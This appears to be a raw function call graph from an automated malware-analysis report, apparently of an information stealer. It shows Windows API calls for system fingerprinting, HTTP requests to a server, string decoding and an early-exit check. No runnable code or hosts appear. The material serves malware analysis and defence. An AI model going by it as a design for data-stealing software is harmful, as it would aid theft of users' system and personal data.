14133->14134 14135 873be5 14134->14135 14136 8745c0 2 API calls 14135->14136 14137 873bfe 14136->14137 14138 8745c0 2 API calls 14137->14138 14139 873c17 14138->14139 14140 8745c0 2 API calls 14139->14140 14141 873c30 14140->14141 14142 8745c0 2 API calls 14141->14142 14143 873c49 14142->14143 14144 8745c0 2 API calls 14143->14144 14145 873c62 14144->14145 14146 8745c0 2 API calls 14145->14146 14147 873c7b 14146->14147 14148 8745c0 2 API calls 14147->14148 14149 873c94 14148->14149 14150 8745c0 2 API calls 14149->14150 14151 873cad 14150->14151 14152 8745c0 2 API calls 14151->14152 14153 873cc6 14152->14153 14154 8745c0 2 API calls 14153->14154 14155 873cdf 14154->14155 14156 8745c0 2 API calls 14155->14156 14157 873cf8 14156->14157 14158 8745c0 2 API calls 14157->14158 14159 873d11 14158->14159 14160 8745c0 2 API calls 14159->14160 14161 873d2a 14160->14161 14162 8745c0 2 API calls 14161->14162 14163 873d43 14162->14163 14164 8745c0 2 API calls 14163->14164 14165 873d5c 14164->14165 14166 8745c0 2 API calls 14165->14166 14167 873d75 14166->14167 14168 8745c0 2 API calls 14167->14168 14169 873d8e 14168->14169 14170 8745c0 2 API calls 14169->14170 14171 873da7 14170->14171 14172 8745c0 2 API calls 14171->14172 14173 873dc0 14172->14173 14174 8745c0 2 API calls 14173->14174 14175 873dd9 14174->14175 14176 8745c0 2 API calls 14175->14176 14177 873df2 14176->14177 14178 8745c0 2 API calls 14177->14178 14179 873e0b 14178->14179 14180 8745c0 2 API calls 14179->14180 14181 873e24 14180->14181 14182 8745c0 2 API calls 14181->14182 14183 873e3d 14182->14183 14184 8745c0 2 API calls 14183->14184 14185 873e56 14184->14185 14186 8745c0 2 API calls 14185->14186 14187 873e6f 14186->14187 14188 8745c0 2 API calls 14187->14188 14189 873e88 14188->14189 14190 8745c0 2 API calls 14189->14190 14191 873ea1 14190->14191 14192 8745c0 2 API calls 14191->14192 14193 873eba 14192->14193 14194 8745c0 2 API calls 14193->14194 14195 873ed3 14194->14195 14196 8745c0 2 API calls 14195->14196 
14197 873eec 14196->14197 14198 8745c0 2 API calls 14197->14198 14199 873f05 14198->14199 14200 8745c0 2 API calls 14199->14200 14201 873f1e 14200->14201 14202 8745c0 2 API calls 14201->14202 14203 873f37 14202->14203 14204 8745c0 2 API calls 14203->14204 14205 873f50 14204->14205 14206 8745c0 2 API calls 14205->14206 14207 873f69 14206->14207 14208 8745c0 2 API calls 14207->14208 14209 873f82 14208->14209 14210 8745c0 2 API calls 14209->14210 14211 873f9b 14210->14211 14212 8745c0 2 API calls 14211->14212 14213 873fb4 14212->14213 14214 8745c0 2 API calls 14213->14214 14215 873fcd 14214->14215 14216 8745c0 2 API calls 14215->14216 14217 873fe6 14216->14217 14218 8745c0 2 API calls 14217->14218 14219 873fff 14218->14219 14220 8745c0 2 API calls 14219->14220 14221 874018 14220->14221 14222 8745c0 2 API calls 14221->14222 14223 874031 14222->14223 14224 8745c0 2 API calls 14223->14224 14225 87404a 14224->14225 14226 8745c0 2 API calls 14225->14226 14227 874063 14226->14227 14228 8745c0 2 API calls 14227->14228 14229 87407c 14228->14229 14230 8745c0 2 API calls 14229->14230 14231 874095 14230->14231 14232 8745c0 2 API calls 14231->14232 14233 8740ae 14232->14233 14234 8745c0 2 API calls 14233->14234 14235 8740c7 14234->14235 14236 8745c0 2 API calls 14235->14236 14237 8740e0 14236->14237 14238 8745c0 2 API calls 14237->14238 14239 8740f9 14238->14239 14240 8745c0 2 API calls 14239->14240 14241 874112 14240->14241 14242 8745c0 2 API calls 14241->14242 14243 87412b 14242->14243 14244 8745c0 2 API calls 14243->14244 14245 874144 14244->14245 14246 8745c0 2 API calls 14245->14246 14247 87415d 14246->14247 14248 8745c0 2 API calls 14247->14248 14249 874176 14248->14249 14250 8745c0 2 API calls 14249->14250 14251 87418f 14250->14251 14252 8745c0 2 API calls 14251->14252 14253 8741a8 14252->14253 14254 8745c0 2 API calls 14253->14254 14255 8741c1 14254->14255 14256 8745c0 2 API calls 14255->14256 14257 8741da 14256->14257 14258 8745c0 2 API calls 14257->14258 14259 8741f3 
14258->14259 14260 8745c0 2 API calls 14259->14260 14261 87420c 14260->14261 14262 8745c0 2 API calls 14261->14262 14263 874225 14262->14263 14264 8745c0 2 API calls 14263->14264 14265 87423e 14264->14265 14266 8745c0 2 API calls 14265->14266 14267 874257 14266->14267 14268 8745c0 2 API calls 14267->14268 14269 874270 14268->14269 14270 8745c0 2 API calls 14269->14270 14271 874289 14270->14271 14272 8745c0 2 API calls 14271->14272 14273 8742a2 14272->14273 14274 8745c0 2 API calls 14273->14274 14275 8742bb 14274->14275 14276 8745c0 2 API calls 14275->14276 14277 8742d4 14276->14277 14278 8745c0 2 API calls 14277->14278 14279 8742ed 14278->14279 14280 8745c0 2 API calls 14279->14280 14281 874306 14280->14281 14282 8745c0 2 API calls 14281->14282 14283 87431f 14282->14283 14284 8745c0 2 API calls 14283->14284 14285 874338 14284->14285 14286 8745c0 2 API calls 14285->14286 14287 874351 14286->14287 14288 8745c0 2 API calls 14287->14288 14289 87436a 14288->14289 14290 8745c0 2 API calls 14289->14290 14291 874383 14290->14291 14292 8745c0 2 API calls 14291->14292 14293 87439c 14292->14293 14294 8745c0 2 API calls 14293->14294 14295 8743b5 14294->14295 14296 8745c0 2 API calls 14295->14296 14297 8743ce 14296->14297 14298 8745c0 2 API calls 14297->14298 14299 8743e7 14298->14299 14300 8745c0 2 API calls 14299->14300 14301 874400 14300->14301 14302 8745c0 2 API calls 14301->14302 14303 874419 14302->14303 14304 8745c0 2 API calls 14303->14304 14305 874432 14304->14305 14306 8745c0 2 API calls 14305->14306 14307 87444b 14306->14307 14308 8745c0 2 API calls 14307->14308 14309 874464 14308->14309 14310 8745c0 2 API calls 14309->14310 14311 87447d 14310->14311 14312 8745c0 2 API calls 14311->14312 14313 874496 14312->14313 14314 8745c0 2 API calls 14313->14314 14315 8744af 14314->14315 14316 8745c0 2 API calls 14315->14316 14317 8744c8 14316->14317 14318 8745c0 2 API calls 14317->14318 14319 8744e1 14318->14319 14320 8745c0 2 API calls 14319->14320 14321 8744fa 14320->14321 
14322 8745c0 2 API calls 14321->14322 14323 874513 14322->14323 14324 8745c0 2 API calls 14323->14324 14325 87452c 14324->14325 14326 8745c0 2 API calls 14325->14326 14327 874545 14326->14327 14328 8745c0 2 API calls 14327->14328 14329 87455e 14328->14329 14330 8745c0 2 API calls 14329->14330 14331 874577 14330->14331 14332 8745c0 2 API calls 14331->14332 14333 874590 14332->14333 14334 8745c0 2 API calls 14333->14334 14335 8745a9 14334->14335 14336 889c10 14335->14336 14337 889c20 43 API calls 14336->14337 14338 88a036 8 API calls 14336->14338 14337->14338 14339 88a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14338->14339 14340 88a146 14338->14340 14339->14340 14341 88a153 8 API calls 14340->14341 14342 88a216 14340->14342 14341->14342 14343 88a298 14342->14343 14344 88a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14342->14344 14345 88a2a5 6 API calls 14343->14345 14346 88a337 14343->14346 14344->14343 14345->14346 14347 88a41f 14346->14347 14348 88a344 9 API calls 14346->14348 14349 88a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14349 14350 88a4a2 14347->14350 14348->14347 14349->14350 14351 88a4ab GetProcAddress GetProcAddress 14350->14351 14352 88a4dc 14350->14352 14351->14352 14353 88a515 14352->14353 14354 88a4e5 GetProcAddress GetProcAddress 14352->14354 14355 88a612 14353->14355 14356 88a522 10 API calls 14353->14356 14354->14353 14357 88a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14357 14358 88a67d 14355->14358 14356->14355 14357->14358 14359 88a69e 14358->14359 14360 88a686 GetProcAddress 14358->14360 14361 885ca3 14359->14361 14362 88a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14359->14362 14360->14359 14363 871590 14361->14363 14362->14361 15482 871670 14363->15482 14366 88a7a0 lstrcpy 14367 8715b5 14366->14367 14368 88a7a0 lstrcpy 14367->14368 14369 8715c7 14368->14369 14370 88a7a0 lstrcpy 
14369->14370 14371 8715d9 14370->14371 14372 88a7a0 lstrcpy 14371->14372 14373 871663 14372->14373 14374 885510 14373->14374 14375 885521 14374->14375 14376 88a820 2 API calls 14375->14376 14377 88552e 14376->14377 14378 88a820 2 API calls 14377->14378 14379 88553b 14378->14379 14380 88a820 2 API calls 14379->14380 14381 885548 14380->14381 14382 88a740 lstrcpy 14381->14382 14383 885555 14382->14383 14384 88a740 lstrcpy 14383->14384 14385 885562 14384->14385 14386 88a740 lstrcpy 14385->14386 14387 88556f 14386->14387 14388 88a740 lstrcpy 14387->14388 14428 88557c 14388->14428 14389 88a740 lstrcpy 14389->14428 14390 8852c0 25 API calls 14390->14428 14391 885643 StrCmpCA 14391->14428 14392 8856a0 StrCmpCA 14393 8857dc 14392->14393 14392->14428 14394 88a8a0 lstrcpy 14393->14394 14395 8857e8 14394->14395 14396 88a820 2 API calls 14395->14396 14397 8857f6 14396->14397 14400 88a820 2 API calls 14397->14400 14398 885856 StrCmpCA 14401 885991 14398->14401 14398->14428 14399 8851f0 20 API calls 14399->14428 14402 885805 14400->14402 14403 88a8a0 lstrcpy 14401->14403 14404 871670 lstrcpy 14402->14404 14405 88599d 14403->14405 14426 885811 14404->14426 14406 88a820 2 API calls 14405->14406 14408 8859ab 14406->14408 14407 88a820 lstrlen lstrcpy 14407->14428 14410 88a820 2 API calls 14408->14410 14409 885a0b StrCmpCA 14411 885a28 14409->14411 14412 885a16 Sleep 14409->14412 14414 8859ba 14410->14414 14415 88a8a0 lstrcpy 14411->14415 14412->14428 14413 88a7a0 lstrcpy 14413->14428 14416 871670 lstrcpy 14414->14416 14417 885a34 14415->14417 14416->14426 14418 88a820 2 API calls 14417->14418 14419 885a43 14418->14419 14420 88a820 2 API calls 14419->14420 14422 885a52 14420->14422 14421 88578a StrCmpCA 14421->14428 14423 871670 lstrcpy 14422->14423 14423->14426 14424 871590 lstrcpy 14424->14428 14425 88593f StrCmpCA 14425->14428 14426->13481 14427 88a8a0 lstrcpy 14427->14428 14428->14389 14428->14390 14428->14391 14428->14392 14428->14398 14428->14399 14428->14407 14428->14409 
14428->14413 14428->14421 14428->14424 14428->14425 14428->14427 14430 88754c 14429->14430 14431 887553 GetVolumeInformationA 14429->14431 14430->14431 14435 887591 14431->14435 14432 8875fc GetProcessHeap RtlAllocateHeap 14433 887628 wsprintfA 14432->14433 14434 887619 14432->14434 14437 88a740 lstrcpy 14433->14437 14436 88a740 lstrcpy 14434->14436 14435->14432 14438 885da7 14436->14438 14437->14438 14438->13502 14440 88a7a0 lstrcpy 14439->14440 14441 874899 14440->14441 15491 8747b0 14441->15491 14443 8748a5 14444 88a740 lstrcpy 14443->14444 14445 8748d7 14444->14445 14446 88a740 lstrcpy 14445->14446 14447 8748e4 14446->14447 14448 88a740 lstrcpy 14447->14448 14449 8748f1 14448->14449 14450 88a740 lstrcpy 14449->14450 14451 8748fe 14450->14451 14452 88a740 lstrcpy 14451->14452 14453 87490b InternetOpenA StrCmpCA 14452->14453 14454 874944 14453->14454 14455 874ecb InternetCloseHandle 14454->14455 15497 888b60 14454->15497 14457 874ee8 14455->14457 15513 879ac0 CryptStringToBinaryA 14457->15513 14458 874963 15505 88a920 14458->15505 14461 874976 14463 88a8a0 lstrcpy 14461->14463 14468 87497f 14463->14468 14464 88a820 2 API calls 14465 874f05 14464->14465 14467 88a9b0 4 API calls 14465->14467 14466 874f27 ctype 14470 88a7a0 lstrcpy 14466->14470 14469 874f1b 14467->14469 14472 88a9b0 4 API calls 14468->14472 14471 88a8a0 lstrcpy 14469->14471 14483 874f57 14470->14483 14471->14466 14473 8749a9 14472->14473 14474 88a8a0 lstrcpy 14473->14474 14475 8749b2 14474->14475 14476 88a9b0 4 API calls 14475->14476 14477 8749d1 14476->14477 14478 88a8a0 lstrcpy 14477->14478 14479 8749da 14478->14479 14480 88a920 3 API calls 14479->14480 14481 8749f8 14480->14481 14482 88a8a0 lstrcpy 14481->14482 14484 874a01 14482->14484 14483->13505 14485 88a9b0 4 API calls 14484->14485 14486 874a20 14485->14486 14487 88a8a0 lstrcpy 14486->14487 14488 874a29 14487->14488 14489 88a9b0 4 API calls 14488->14489 14490 874a48 14489->14490 14491 88a8a0 lstrcpy 14490->14491 14492 874a51 14491->14492 
14493 88a9b0 4 API calls 14492->14493 14494 874a7d 14493->14494 14495 88a920 3 API calls 14494->14495 14496 874a84 14495->14496 14497 88a8a0 lstrcpy 14496->14497 14498 874a8d 14497->14498 14499 874aa3 InternetConnectA 14498->14499 14499->14455 14500 874ad3 HttpOpenRequestA 14499->14500 14502 874ebe InternetCloseHandle 14500->14502 14503 874b28 14500->14503 14502->14455 14504 88a9b0 4 API calls 14503->14504 14505 874b3c 14504->14505 14506 88a8a0 lstrcpy 14505->14506 14507 874b45 14506->14507 14508 88a920 3 API calls 14507->14508 14509 874b63 14508->14509 14510 88a8a0 lstrcpy 14509->14510 14511 874b6c 14510->14511 14512 88a9b0 4 API calls 14511->14512 14513 874b8b 14512->14513 14514 88a8a0 lstrcpy 14513->14514 14515 874b94 14514->14515 14516 88a9b0 4 API calls 14515->14516 14517 874bb5 14516->14517 14518 88a8a0 lstrcpy 14517->14518 14519 874bbe 14518->14519 14520 88a9b0 4 API calls 14519->14520 14521 874bde 14520->14521 14522 88a8a0 lstrcpy 14521->14522 14523 874be7 14522->14523 14524 88a9b0 4 API calls 14523->14524 14525 874c06 14524->14525 14526 88a8a0 lstrcpy 14525->14526 14527 874c0f 14526->14527 14528 88a920 3 API calls 14527->14528 14529 874c2d 14528->14529 14530 88a8a0 lstrcpy 14529->14530 14531 874c36 14530->14531 14532 88a9b0 4 API calls 14531->14532 14533 874c55 14532->14533 14534 88a8a0 lstrcpy 14533->14534 14535 874c5e 14534->14535 14536 88a9b0 4 API calls 14535->14536 14537 874c7d 14536->14537 14538 88a8a0 lstrcpy 14537->14538 14539 874c86 14538->14539 14540 88a920 3 API calls 14539->14540 14541 874ca4 14540->14541 14542 88a8a0 lstrcpy 14541->14542 14543 874cad 14542->14543 14544 88a9b0 4 API calls 14543->14544 14545 874ccc 14544->14545 14546 88a8a0 lstrcpy 14545->14546 14547 874cd5 14546->14547 14548 88a9b0 4 API calls 14547->14548 14549 874cf6 14548->14549 14550 88a8a0 lstrcpy 14549->14550 14551 874cff 14550->14551 14552 88a9b0 4 API calls 14551->14552 14553 874d1f 14552->14553 14554 88a8a0 lstrcpy 14553->14554 14555 874d28 14554->14555 14556 88a9b0 4 
API calls 14555->14556 14557 874d47 14556->14557 14558 88a8a0 lstrcpy 14557->14558 14559 874d50 14558->14559 14560 88a920 3 API calls 14559->14560 14561 874d6e 14560->14561 14562 88a8a0 lstrcpy 14561->14562 14563 874d77 14562->14563 14564 88a740 lstrcpy 14563->14564 14565 874d92 14564->14565 14566 88a920 3 API calls 14565->14566 14567 874db3 14566->14567 14568 88a920 3 API calls 14567->14568 14569 874dba 14568->14569 14570 88a8a0 lstrcpy 14569->14570 14571 874dc6 14570->14571 14572 874de7 lstrlen 14571->14572 14573 874dfa 14572->14573 14574 874e03 lstrlen 14573->14574 15511 88aad0 14574->15511 14577 874e32 InternetReadFile 14578 874e67 InternetCloseHandle 14577->14578 14583 874e5e 14577->14583 14580 88a800 14578->14580 14580->14502 14581 88a9b0 4 API calls 14581->14583 14582 88a8a0 lstrcpy 14582->14583 14583->14577 14583->14578 14583->14581 14583->14582 14585 88aad0 14584->14585 14586 8817c4 StrCmpCA 14585->14586 14587 8817cf ExitProcess 14586->14587 14588 8817d7 14586->14588 14589 8819c2 14588->14589 14590 8818ad StrCmpCA 14588->14590 14591 8818cf StrCmpCA 14588->14591 14592 88185d StrCmpCA 14588->14592 14593 88187f StrCmpCA 14588->14593 14594 881970 StrCmpCA 14588->14594 14595 8818f1 StrCmpCA 14588->14595 14596 881951 StrCmpCA 14588->14596 14597 881932 StrCmpCA 14588->14597 14598 881913 StrCmpCA 14588->14598 14599 88a820 lstrlen lstrcpy 14588->14599 14589->13507 14590->14588 14591->14588 14592->14588 14593->14588 14594->14588 14595->14588 14596->14588 14597->14588 14598->14588 14599->14588 14601 88a7a0 lstrcpy 14600->14601 14602 875979 14601->14602 14603 8747b0 2 API calls 14602->14603 14604 875985 14603->14604 14605 88a740 lstrcpy 14604->14605 14606 8759ba 14605->14606 14607 88a740 lstrcpy 14606->14607 14608 8759c7 14607->14608 14609 88a740 lstrcpy 14608->14609 14610 8759d4 14609->14610 14611 88a740 lstrcpy 14610->14611 14612 8759e1 14611->14612 14613 88a740 lstrcpy 14612->14613 14614 8759ee InternetOpenA StrCmpCA 14613->14614 14615 875a1d 14614->14615 14616 
875fc3 InternetCloseHandle 14615->14616 14618 888b60 3 API calls 14615->14618 14617 875fe0 14616->14617 14621 879ac0 4 API calls 14617->14621 14619 875a3c 14618->14619 14620 88a920 3 API calls 14619->14620 14622 875a4f 14620->14622 14623 875fe6 14621->14623 14624 88a8a0 lstrcpy 14622->14624 14625 88a820 2 API calls 14623->14625 14627 87601f ctype 14623->14627 14629 875a58 14624->14629 14626 875ffd 14625->14626 14628 88a9b0 4 API calls 14626->14628 14631 88a7a0 lstrcpy 14627->14631 14630 876013 14628->14630 14633 88a9b0 4 API calls 14629->14633 14632 88a8a0 lstrcpy 14630->14632 14641 87604f 14631->14641 14632->14627 14634 875a82 14633->14634 14635 88a8a0 lstrcpy 14634->14635 14636 875a8b 14635->14636 14637 88a9b0 4 API calls 14636->14637 14638 875aaa 14637->14638 14639 88a8a0 lstrcpy 14638->14639 14640 875ab3 14639->14640 14642 88a920 3 API calls 14640->14642 14641->13513 14643 875ad1 14642->14643 14644 88a8a0 lstrcpy 14643->14644 14645 875ada 14644->14645 14646 88a9b0 4 API calls 14645->14646 14647 875af9 14646->14647 14648 88a8a0 lstrcpy 14647->14648 14649 875b02 14648->14649 14650 88a9b0 4 API calls 14649->14650 14651 875b21 14650->14651 14652 88a8a0 lstrcpy 14651->14652 14653 875b2a 14652->14653 14654 88a9b0 4 API calls 14653->14654 14655 875b56 14654->14655 14656 88a920 3 API calls 14655->14656 14657 875b5d 14656->14657 14658 88a8a0 lstrcpy 14657->14658 14659 875b66 14658->14659 14660 875b7c InternetConnectA 14659->14660 14660->14616 14661 875bac HttpOpenRequestA 14660->14661 14663 875fb6 InternetCloseHandle 14661->14663 14664 875c0b 14661->14664 14663->14616 14665 88a9b0 4 API calls 14664->14665 14666 875c1f 14665->14666 14667 88a8a0 lstrcpy 14666->14667 14668 875c28 14667->14668 14669 88a920 3 API calls 14668->14669 14670 875c46 14669->14670 14671 88a8a0 lstrcpy 14670->14671 14672 875c4f 14671->14672 14673 88a9b0 4 API calls 14672->14673 14674 875c6e 14673->14674 14675 88a8a0 lstrcpy 14674->14675 14676 875c77 14675->14676 14677 88a9b0 4 API calls 14676->14677 
14678 875c98 14677->14678 14679 88a8a0 lstrcpy 14678->14679 14680 875ca1 14679->14680 14681 88a9b0 4 API calls 14680->14681 14682 875cc1 14681->14682 14683 88a8a0 lstrcpy 14682->14683 14684 875cca 14683->14684 14685 88a9b0 4 API calls 14684->14685 14686 875ce9 14685->14686 14687 88a8a0 lstrcpy 14686->14687 14688 875cf2 14687->14688 14689 88a920 3 API calls 14688->14689 14690 875d10 14689->14690 14691 88a8a0 lstrcpy 14690->14691 14692 875d19 14691->14692 14693 88a9b0 4 API calls 14692->14693 14694 875d38 14693->14694 14695 88a8a0 lstrcpy 14694->14695 14696 875d41 14695->14696 14697 88a9b0 4 API calls 14696->14697 14698 875d60 14697->14698 14699 88a8a0 lstrcpy 14698->14699 14700 875d69 14699->14700 14701 88a920 3 API calls 14700->14701 14702 875d87 14701->14702 14703 88a8a0 lstrcpy 14702->14703 14704 875d90 14703->14704 14705 88a9b0 4 API calls 14704->14705 14706 875daf 14705->14706 14707 88a8a0 lstrcpy 14706->14707 14708 875db8 14707->14708 14709 88a9b0 4 API calls 14708->14709 14710 875dd9 14709->14710 14711 88a8a0 lstrcpy 14710->14711 14712 875de2 14711->14712 14713 88a9b0 4 API calls 14712->14713 14714 875e02 14713->14714 14715 88a8a0 lstrcpy 14714->14715 14716 875e0b 14715->14716 14717 88a9b0 4 API calls 14716->14717 14718 875e2a 14717->14718 14719 88a8a0 lstrcpy 14718->14719 14720 875e33 14719->14720 14721 88a920 3 API calls 14720->14721 14722 875e54 14721->14722 14723 88a8a0 lstrcpy 14722->14723 14724 875e5d 14723->14724 14725 875e70 lstrlen 14724->14725 14726 88aad0 14725->14726 14727 875e81 lstrlen GetProcessHeap RtlAllocateHeap 14726->14727 14728 88aad0 14727->14728 14729 875eae lstrlen 14728->14729 14730 875ebe 14729->14730 14731 875ed7 lstrlen 14730->14731 14732 875ee7 14731->14732 14733 875ef0 lstrlen 14732->14733 14734 875f04 14733->14734 14735 875f1a lstrlen 14734->14735 14736 88aad0 14735->14736 14737 875f2a HttpSendRequestA 14736->14737 14738 875f35 InternetReadFile 14737->14738 14739 875f6a InternetCloseHandle 14738->14739 14743 875f61 14738->14743 
14739->14663 14741 88a9b0 4 API calls 14741->14743 14742 88a8a0 lstrcpy 14742->14743 14743->14738 14743->14739 14743->14741 14743->14742 14745 881077 14744->14745 14746 881151 14745->14746 14747 88a820 lstrlen lstrcpy 14745->14747 14746->13515 14747->14745 14749 880db7 14748->14749 14750 880f17 14749->14750 14751 880ea4 StrCmpCA 14749->14751 14752 880e27 StrCmpCA 14749->14752 14753 880e67 StrCmpCA 14749->14753 14754 88a820 lstrlen lstrcpy 14749->14754 14750->13523 14751->14749 14752->14749 14753->14749 14754->14749 14757 880f67 14755->14757 14756 881044 14756->13531 14757->14756 14758 880fb2 StrCmpCA 14757->14758 14759 88a820 lstrlen lstrcpy 14757->14759 14758->14757 14759->14757 14761 88a740 lstrcpy 14760->14761 14762 881a26 14761->14762 14763 88a9b0 4 API calls 14762->14763 14764 881a37 14763->14764 14765 88a8a0 lstrcpy 14764->14765 14766 881a40 14765->14766 14767 88a9b0 4 API calls 14766->14767 14768 881a5b 14767->14768 14769 88a8a0 lstrcpy 14768->14769 14770 881a64 14769->14770 14771 88a9b0 4 API calls 14770->14771 14772 881a7d 14771->14772 14773 88a8a0 lstrcpy 14772->14773 14774 881a86 14773->14774 14775 88a9b0 4 API calls 14774->14775 14776 881aa1 14775->14776 14777 88a8a0 lstrcpy 14776->14777 14778 881aaa 14777->14778 14779 88a9b0 4 API calls 14778->14779 14780 881ac3 14779->14780 14781 88a8a0 lstrcpy 14780->14781 14782 881acc 14781->14782 14783 88a9b0 4 API calls 14782->14783 14784 881ae7 14783->14784 14785 88a8a0 lstrcpy 14784->14785 14786 881af0 14785->14786 14787 88a9b0 4 API calls 14786->14787 14788 881b09 14787->14788 14789 88a8a0 lstrcpy 14788->14789 14790 881b12 14789->14790 14791 88a9b0 4 API calls 14790->14791 14792 881b2d 14791->14792 14793 88a8a0 lstrcpy 14792->14793 14794 881b36 14793->14794 14795 88a9b0 4 API calls 14794->14795 14796 881b4f 14795->14796 14797 88a8a0 lstrcpy 14796->14797 14798 881b58 14797->14798 14799 88a9b0 4 API calls 14798->14799 14800 881b76 14799->14800 14801 88a8a0 lstrcpy 14800->14801 14802 881b7f 14801->14802 14803 
887500 6 API calls 14802->14803 14804 881b96 14803->14804 14805 88a920 3 API calls 14804->14805 14806 881ba9 14805->14806 14807 88a8a0 lstrcpy 14806->14807 14808 881bb2 14807->14808 14809 88a9b0 4 API calls 14808->14809 14810 881bdc 14809->14810 14811 88a8a0 lstrcpy 14810->14811 14812 881be5 14811->14812 14813 88a9b0 4 API calls 14812->14813 14814 881c05 14813->14814 14815 88a8a0 lstrcpy 14814->14815 14816 881c0e 14815->14816 15518 887690 GetProcessHeap RtlAllocateHeap 14816->15518 14819 88a9b0 4 API calls 14820 881c2e 14819->14820 14821 88a8a0 lstrcpy 14820->14821 14822 881c37 14821->14822 14823 88a9b0 4 API calls 14822->14823 14824 881c56 14823->14824 14825 88a8a0 lstrcpy 14824->14825 14826 881c5f 14825->14826 14827 88a9b0 4 API calls 14826->14827 14828 881c80 14827->14828 14829 88a8a0 lstrcpy 14828->14829 14830 881c89 14829->14830 15525 8877c0 GetCurrentProcess IsWow64Process 14830->15525 14833 88a9b0 4 API calls 14834 881ca9 14833->14834 14835 88a8a0 lstrcpy 14834->14835 14836 881cb2 14835->14836 14837 88a9b0 4 API calls 14836->14837 14838 881cd1 14837->14838 14839 88a8a0 lstrcpy 14838->14839 14840 881cda 14839->14840 14841 88a9b0 4 API calls 14840->14841 14842 881cfb 14841->14842 14843 88a8a0 lstrcpy 14842->14843 14844 881d04 14843->14844 14845 887850 3 API calls 14844->14845 14846 881d14 14845->14846 14847 88a9b0 4 API calls 14846->14847 14848 881d24 14847->14848 14849 88a8a0 lstrcpy 14848->14849 14850 881d2d 14849->14850 14851 88a9b0 4 API calls 14850->14851 14852 881d4c 14851->14852 14853 88a8a0 lstrcpy 14852->14853 14854 881d55 14853->14854 14855 88a9b0 4 API calls 14854->14855 14856 881d75 14855->14856 14857 88a8a0 lstrcpy 14856->14857 14858 881d7e 14857->14858 14859 8878e0 3 API calls 14858->14859 14860 881d8e 14859->14860 14861 88a9b0 4 API calls 14860->14861 14862 881d9e 14861->14862 14863 88a8a0 lstrcpy 14862->14863 14864 881da7 14863->14864 14865 88a9b0 4 API calls 14864->14865 14866 881dc6 14865->14866 14867 88a8a0 lstrcpy 14866->14867 14868 881dcf 
14867->14868 14869 88a9b0 4 API calls 14868->14869 14870 881df0 14869->14870 14871 88a8a0 lstrcpy 14870->14871 14872 881df9 14871->14872 15527 887980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14872->15527 14875 88a9b0 4 API calls 14876 881e19 14875->14876 14877 88a8a0 lstrcpy 14876->14877 14878 881e22 14877->14878 14879 88a9b0 4 API calls 14878->14879 14880 881e41 14879->14880 14881 88a8a0 lstrcpy 14880->14881 14882 881e4a 14881->14882 14883 88a9b0 4 API calls 14882->14883 14884 881e6b 14883->14884 14885 88a8a0 lstrcpy 14884->14885 14886 881e74 14885->14886 15529 887a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14886->15529 14889 88a9b0 4 API calls 14890 881e94 14889->14890 14891 88a8a0 lstrcpy 14890->14891 14892 881e9d 14891->14892 14893 88a9b0 4 API calls 14892->14893 14894 881ebc 14893->14894 14895 88a8a0 lstrcpy 14894->14895 14896 881ec5 14895->14896 14897 88a9b0 4 API calls 14896->14897 14898 881ee5 14897->14898 14899 88a8a0 lstrcpy 14898->14899 14900 881eee 14899->14900 15532 887b00 GetUserDefaultLocaleName 14900->15532 14903 88a9b0 4 API calls 14904 881f0e 14903->14904 14905 88a8a0 lstrcpy 14904->14905 14906 881f17 14905->14906 14907 88a9b0 4 API calls 14906->14907 14908 881f36 14907->14908 14909 88a8a0 lstrcpy 14908->14909 14910 881f3f 14909->14910 14911 88a9b0 4 API calls 14910->14911 14912 881f60 14911->14912 14913 88a8a0 lstrcpy 14912->14913 14914 881f69 14913->14914 15536 887b90 14914->15536 14916 881f80 14917 88a920 3 API calls 14916->14917 14918 881f93 14917->14918 14919 88a8a0 lstrcpy 14918->14919 14920 881f9c 14919->14920 14921 88a9b0 4 API calls 14920->14921 14922 881fc6 14921->14922 14923 88a8a0 lstrcpy 14922->14923 14924 881fcf 14923->14924 14925 88a9b0 4 API calls 14924->14925 14926 881fef 14925->14926 14927 88a8a0 lstrcpy 14926->14927 14928 881ff8 14927->14928 15548 887d80 GetSystemPowerStatus 14928->15548 14931 88a9b0 4 API calls 14932 882018 14931->14932 14933 88a8a0 lstrcpy 14932->14933 14934 882021 14933->14934 14935 
88a9b0 4 API calls 14934->14935 14936 882040 14935->14936 14937 88a8a0 lstrcpy 14936->14937 14938 882049 14937->14938 14939 88a9b0 4 API calls 14938->14939 14940 88206a 14939->14940 14941 88a8a0 lstrcpy 14940->14941 14942 882073 14941->14942 14943 88207e GetCurrentProcessId 14942->14943 15550 889470 OpenProcess 14943->15550 14946 88a920 3 API calls 14947 8820a4 14946->14947 14948 88a8a0 lstrcpy 14947->14948 14949 8820ad 14948->14949 14950 88a9b0 4 API calls 14949->14950 14951 8820d7 14950->14951 14952 88a8a0 lstrcpy 14951->14952 14953 8820e0 14952->14953 14954 88a9b0 4 API calls 14953->14954 14955 882100 14954->14955 14956 88a8a0 lstrcpy 14955->14956 14957 882109 14956->14957 15555 887e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14957->15555 14960 88a9b0 4 API calls 14961 882129 14960->14961 14962 88a8a0 lstrcpy 14961->14962 14963 882132 14962->14963 14964 88a9b0 4 API calls 14963->14964 14965 882151 14964->14965 14966 88a8a0 lstrcpy 14965->14966 14967 88215a 14966->14967 14968 88a9b0 4 API calls 14967->14968 14969 88217b 14968->14969 14970 88a8a0 lstrcpy 14969->14970 14971 882184 14970->14971 15559 887f60 14971->15559 14974 88a9b0 4 API calls 14975 8821a4 14974->14975 14976 88a8a0 lstrcpy 14975->14976 14977 8821ad 14976->14977 14978 88a9b0 4 API calls 14977->14978 14979 8821cc 14978->14979 14980 88a8a0 lstrcpy 14979->14980 14981 8821d5 14980->14981 14982 88a9b0 4 API calls 14981->14982 14983 8821f6 14982->14983 14984 88a8a0 lstrcpy 14983->14984 14985 8821ff 14984->14985 15572 887ed0 GetSystemInfo wsprintfA 14985->15572 14988 88a9b0 4 API calls 14989 88221f 14988->14989 14990 88a8a0 lstrcpy 14989->14990 14991 882228 14990->14991 14992 88a9b0 4 API calls 14991->14992 14993 882247 14992->14993 14994 88a8a0 